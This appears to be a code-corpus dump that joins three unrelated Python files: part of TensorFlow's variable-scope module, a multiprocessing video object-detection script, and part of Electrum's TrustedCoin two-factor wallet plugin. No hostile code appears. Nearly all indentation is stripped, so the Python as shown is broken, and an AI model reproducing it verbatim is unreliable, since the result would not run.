self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export("variable_op_scope")
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
      # Note: the caller distributes any remainder by enlarging the first
      # shards by one element each along this dimension.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", True)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
dtype = kwargs.get("dtype", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource or (use_resource is None and context.executing_eagerly()):
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint)
elif not use_resource and context.executing_eagerly():
raise RuntimeError(
"VariableScope should use resource variable when eager execution is"
" enabled, but use_resource is False."
)
else:
return variables.Variable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint)
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
def variable(initial_value=None,
trainable=True,
collections=None,
validate_shape=True,
caching_device=None,
name=None,
dtype=None,
constraint=None,
use_resource=None):
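  """Creates a variable, routing the request through the graph's variable
  creator stack (see `variable_creator_scope`). Falls back to
  `default_variable_creator` when no custom creators are installed.
  """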
previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
for getter in ops.get_default_graph()._variable_creator_stack: # pylint: disable=protected-access
previous_getter = _make_getter(getter, previous_getter)
return previous_getter(initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name, dtype=dtype,
constraint=constraint,
use_resource=use_resource)
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
  If the creator does want to create a variable, it should eventually call
  next_creator rather than constructing a Variable or ResourceVariable
  directly; this keeps creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
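# Illustrative sketch (not part of the original module): a minimal custom
# creator that logs the variable name and then defers to the next creator in
# line, used roughly as follows.
#
# def logging_creator(next_creator, **kwargs):
#   print("creating variable:", kwargs.get("name"))
#   return next_creator(**kwargs)
#
# with variable_creator_scope(logging_creator):
#   v = variable(initial_value=[1.0, 2.0], name="v")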
|
object_detection_tf_multiprocessing.py
|
import os
import tarfile
import tensorflow as tf
import multiprocessing
from multiprocessing import Queue
import time
import argparse
import logging
import numpy as np
import cv2
from myutil import downloadutil, fps_measure, queue_seq
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-v', '--video', type=str, required=True,
help="video file for detection")
arg_parser.add_argument('-p', "--process", type=int, default=1,
help="# of detection process")
args = arg_parser.parse_args()
# What model to download.
# MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_08'
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
def load_graph(model_name=MODEL_NAME):
MODEL_FILE = model_name + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = model_name + '/frozen_inference_graph.pb'
downloadutil.maybe_download(os.getcwd(), MODEL_FILE,
DOWNLOAD_BASE+MODEL_FILE)
tar_file = tarfile.open(MODEL_FILE)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, os.getcwd())
# load graph
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
NUM_CLASSES = 90
def load_label_map(label_map_name, num_class):
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('data', label_map_name)
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=num_class, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
return category_index
def detect_object(detection_graph, sess, image, category_index):
with detection_graph.as_default():
with sess.as_default() as sess:
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# image = Image.open(image_path)
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
# image_np = load_image_into_numpy_array(image)
image_np = image
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Actual detection.
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8,
min_score_thresh = 0.7)
return image_np
detection_graph = load_graph(model_name=MODEL_NAME)
category_index = load_label_map(label_map_name='mscoco_label_map.pbtxt', num_class=NUM_CLASSES)
image_q = Queue(maxsize=200)
processed_q = queue_seq.Queue_Seq(maxsize=200)
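# Queue_Seq comes from the local myutil package; it is assumed here to hand
# frames back in sequence order even when multiple detector processes finish
# out of order (the frame-order check in main() guards that assumption).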
# a process that puts images into image_q
def image_worker(image_q, video_file):
logging.info("image worker start")
video_capture = cv2.VideoCapture(video_file)
ret, frame = video_capture.read()
if not ret:
logging.error("Can not read video file, please check!!!!")
frame_count = 0
while ret:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_q.put((frame_count, frame))
logging.debug("put image into queue")
ret, frame = video_capture.read()
frame_count += 1
video_capture.release()
input_process = multiprocessing.Process(target=image_worker, args=(image_q, args.video))
# a process that runs object detection on frames from image_q
def object_detection_worker(image_q, processed_q, detection_graph, category_index, fps=None):
print("detection worker start")
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
sess = tf.Session(graph=detection_graph, config=config)
while True:
frame_count, frame = image_q.get()
t = time.time()
ann_image = detect_object(detection_graph, sess, frame, category_index)
ann_image = cv2.cvtColor(ann_image, cv2.COLOR_RGB2BGR)
if fps:
fps.add_frame()
processed_q.put((frame_count, ann_image))
def main():
# configure logger
logging.basicConfig(
level=logging.INFO,
)
# setup fps counter
fps = fps_measure.FPS()
fps.start_count()
detector_process = [multiprocessing.Process(target=object_detection_worker,
args=(image_q, processed_q, detection_graph, category_index, fps))
for i in range(args.process)]
input_process.start()
for p in detector_process:
p.start()
last_frame = -1
while True:
frame_count, ann_image = processed_q.get()
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(ann_image, 'FPS:{}'.format(int(fps.get_fps())), (50, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)
# check frame order
if last_frame != -1:
if last_frame +1 != frame_count:
cv2.putText(ann_image, "Frame order error", (100,100), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
last_frame = frame_count
cv2.imshow('frame', ann_image)
# print("fps is:", fps.get_fps())
if cv2.waitKey(1) & 0xFF == ord('q'):
break
input_process.terminate()
for p in detector_process:
p.terminate()
input_process.join()
for p in detector_process:
p.join()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
from .legacy_tx_format import serialize_tx_in_legacy_format
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
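# Illustrative usage sketch (assumes a reachable TrustedCoin server and a
# running Electrum Network instance; short_id and raw_tx are placeholders):
#
# client = TrustedCoinCosignerClient(user_agent="example/0.1")
# tos = client.get_terms_of_service()  # plain-text terms for the default plan
# info = client.get(short_id)  # billing info for an existing cosigner
# signed = client.sign(short_id, raw_tx, otp=123456)  # co-sign a transaction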
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
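# sanity check below: refuse an implausibly high fee (assumed to be
# denominated in satoshis, i.e. more than 100000 per prepaid transaction)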
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, is_sweep=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total input value is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = serialize_tx_in_legacy_format(tx, wallet=self)
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
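# Derivation sketch (descriptive comment, not in the original): the billing
# node is make_xpub(get_billing_xpub(), long_id), i.e. the shared billing xpub
# CKD'd once with the user's long id (sha256 of the two sorted xpubs); billing
# address number `num` is that node's /num child, rendered as p2pkh for
# 'legacy' or p2wpkh for 'segwit'.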
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
